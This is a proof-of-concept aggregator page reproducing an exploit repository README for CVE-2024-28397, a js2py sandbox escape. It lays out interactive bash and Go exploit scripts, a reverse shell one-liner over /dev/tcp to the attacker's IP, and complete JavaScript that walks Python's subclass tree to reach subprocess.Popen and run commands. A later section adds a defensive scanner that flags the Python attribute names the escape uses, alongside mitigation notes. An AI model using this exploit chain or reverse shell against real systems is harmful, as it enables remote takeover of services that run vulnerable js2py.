Related vulnerability
Title:
Js2Py security vulnerability
(CVE-2024-28397)
Description: Js2Py is a library of the Python Foundation, used to translate JavaScript into Python code. Js2Py versions 0.74 and earlier contain a security vulnerability that stems from an issue in the component js2py.disable_pyimport(); an attacker can exploit it to execute arbitrary code through a crafted API call.
Introduction
# CVE-2024-28397 js2py Sandbox Escape Exploit
A collection of exploit scripts targeting the js2py sandbox escape vulnerability (CVE-2024-28397) that allows arbitrary code execution through Python object introspection.
## 🔍 Vulnerability Overview
The js2py library contains a critical sandbox escape vulnerability that allows attackers to execute arbitrary Python code by accessing internal Python objects through JavaScript's `Object.getOwnPropertyNames()` method.
### Technical Details
- **CVE ID**: CVE-2024-28397
- **Affected Library**: js2py (JavaScript to Python translator)
- **Attack Vector**: Sandbox escape via Python object introspection
- **Impact**: Remote Code Execution (RCE)
## 📋 Reference Analysis
This exploit is based on the comprehensive analysis by Marven11:
- **Analysis Document**: [CVE-2024-28397 js2py Sandbox Escape Analysis](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_en.md)
## 🛠️ Exploit Scripts
This repository contains three different implementations:
### 1. Bash Script (`exploit.sh`)
Lightweight bash implementation using curl and jq.
### 2. Go Script (`exploit.go`)
Cross-platform Go implementation with built-in HTTP client.
## 🚀 Quick Start
### Prerequisites
- **For Bash script**: `curl`, `jq`, `base64`
- **For Go script**: Go 1.16+
### Usage
All scripts are interactive and will prompt for required information:
```bash
# Bash version
chmod +x exploit.sh
./exploit.sh
# Go version
go run exploit.go
```
### Interactive Prompts
Each script will ask for:
1. **Target URL**: The endpoint running vulnerable js2py code
2. **Your IP**: Your machine's IP address for reverse shell
3. **Your Port**: Port number for reverse shell connection
### Example Session
```bash
$ ./exploit.sh
Target URL: http://target.example.com:8000/run_code
Your IP: 10.10.14.3
Your Port: 9001
Sending to http://target.example.com:8000/run_code with reverse shell 10.10.14.3:9001
{"result": "executed"}
```
## 🎯 How It Works
### 1. Payload Generation
The exploit dynamically creates a reverse shell command:
```bash
sh -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1
```
### 2. Base64 Encoding
The shell command is base64-encoded for safe transmission:
```bash
base64_payload=$(echo -n "$reverse_shell" | base64 -w 0)
```
### 3. JavaScript Sandbox Escape
The core exploit uses JavaScript to access Python's internal objects:
```javascript
let cmd = "printf BASE64_PAYLOAD|base64 -d|bash";
// Steps 1-2: obtain a Python bound method from a JS object, then walk up to the `object` base class
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a, "__class__"), "__base__");
// Step 3: depth-first search of the subclass tree for subprocess.Popen
function findpopen(o) {
    for (let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i];
        if (item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
        if (item.__name__ != "type") {
            let result = findpopen(item);
            if (result) return result;
        }
    }
}
// Step 4: run the command through Popen and wait for it
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
```
### 4. Execution Flow
1. Access Python's object system through `Object.getOwnPropertyNames({})`
2. Navigate to base classes via `__class__.__base__.__getattribute__`
3. Search subclasses for `subprocess.Popen`
4. Execute arbitrary system commands through `Popen`
## 🛡️ Mitigation
- Update js2py to a patched version
- Implement proper input validation and sanitization
- Use secure sandboxing alternatives
- Apply defense-in-depth security measures
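The escape chain described under "How It Works" only functions because the JavaScript is allowed to name Python-only attributes (`__class__`, `__base__`, `__getattribute__`, `__subclasses__`). A service that feeds user-supplied JavaScript to js2py can therefore detect the pattern before evaluation and in its request logs. The following is an added example written for this page, not code from the exploit repository or from js2py: a heuristic scanner that flags those Python-only attribute names while leaving JavaScript's own dunder names such as `__proto__` alone. All sample snippets are constructed. Upgrading js2py is the fix; a name denylist is bypassable (attribute names can be assembled at runtime), so treat a hit as grounds to refuse the submission and alert, not as a substitute for the patch.

```python
"""Flag JavaScript submissions that reach into the Python host of js2py.

Added example for this page (not part of the exploit repository or js2py).
Heuristic pre-filter / log scanner: looks for the Python-only attribute
names the sandbox-escape chain depends on.  Detection and defence in depth,
not a replacement for upgrading js2py.
"""
import re
from dataclasses import dataclass

# Attribute names that exist on Python objects, not on JavaScript values.
# Their presence in a JS snippet means the script is addressing the interpreter.
STRONG_PYTHON_DUNDERS = frozenset({
    "__class__", "__base__", "__bases__", "__mro__", "__subclasses__",
    "__getattribute__", "__globals__", "__builtins__", "__import__",
})
# Python class/module metadata: weak on its own, but used by the payload
# on this page to recognise subprocess.Popen while walking the subclass tree.
WEAK_PYTHON_DUNDERS = frozenset({"__module__", "__name__"})

# Any __name__-shaped token.  JavaScript has its own (e.g. __proto__), so a
# match is filtered against the sets above rather than treated as a hit.
_DUNDER = re.compile(r"__[A-Za-z][A-Za-z0-9_]*__")
# The JS entry point the escape chain on this page starts from.
_GET_OWN_PROPS = re.compile(r"Object\s*\.\s*getOwnPropertyNames\s*\(")
# String literals naming the process-spawning machinery the payload searches for.
_PROCESS_STRINGS = re.compile(r"""["'](subprocess|Popen)["']""")


@dataclass(frozen=True)
class ScanResult:
    strong: tuple                 # Python-only dunders that alone justify refusal
    weak: tuple                   # Python metadata dunders
    get_own_property_names: bool  # entry point present
    process_strings: tuple        # "subprocess"/"Popen" literals seen

    @property
    def suspicious(self) -> bool:
        # One strong indicator is enough; weak ones count only alongside the entry point.
        return bool(self.strong) or (self.get_own_property_names and bool(self.weak))


def scan_js(source: str) -> ScanResult:
    """Collect escape indicators from a JavaScript snippet without executing it."""
    tokens = set(_DUNDER.findall(source))
    return ScanResult(
        strong=tuple(sorted(tokens & STRONG_PYTHON_DUNDERS)),
        weak=tuple(sorted(tokens & WEAK_PYTHON_DUNDERS)),
        get_own_property_names=bool(_GET_OWN_PROPS.search(source)),
        process_strings=tuple(sorted(set(_PROCESS_STRINGS.findall(source)))),
    )


def gate(source: str) -> bool:
    """True when the snippet may be handed to js2py, False when it must be refused."""
    return not scan_js(source).suspicious


# Constructed samples (not captured traffic).
BENIGN = "var total = items.map(x => x.price).reduce((a, b) => a + b, 0);"
BENIGN_JS_DUNDER = "if (Object.getPrototypeOf(o) === o.__proto__) { ok = true; }"
CHAIN_FRAGMENT = "let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;"
METADATA_ONLY = 'Object.getOwnPropertyNames(x); if (item.__module__ == "subprocess") {}'

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("benign_js_dunder", BENIGN_JS_DUNDER),
               ("chain_fragment", CHAIN_FRAGMENT), ("metadata_only", METADATA_ONLY)]
    for label, src in samples:
        r = scan_js(src)
        print(f"{label}: allow={gate(src)} strong={r.strong} weak={r.weak} "
              f"getOwnPropertyNames={r.get_own_property_names} strings={r.process_strings}")
```

Run it as a module to see the four verdicts, or call `gate()` in front of `js2py.eval_js` and log `scan_js()` output for every refused submission so that the indicators, not just a boolean, reach the SIEM. The `__proto__` sample is there deliberately: filtering on "any dunder" would block ordinary JavaScript, which is why the scanner matches against explicit Python-only name sets.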
## 📚 Educational Purpose
These scripts are provided for educational and authorized testing purposes only. Always ensure you have proper authorization before testing against any systems.
## 🔗 References
- [CVE-2024-28397 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28397)
- [Marven11's Detailed Analysis](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_en.md)
- [js2py GitHub Repository](https://github.com/PiotrDabkowski/Js2Py)
## ⚖️ Disclaimer
This software is provided for educational and authorized security testing purposes only. Users are responsible for complying with applicable laws and obtaining proper authorization before use.
File snapshot
[4.0K] /data/pocs/9a94d289f442fa8d9dba31555f34bd146d3a2f43
├── [1.6K] exploit.go
├── [1.0K] exploit.sh
└── [4.1K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.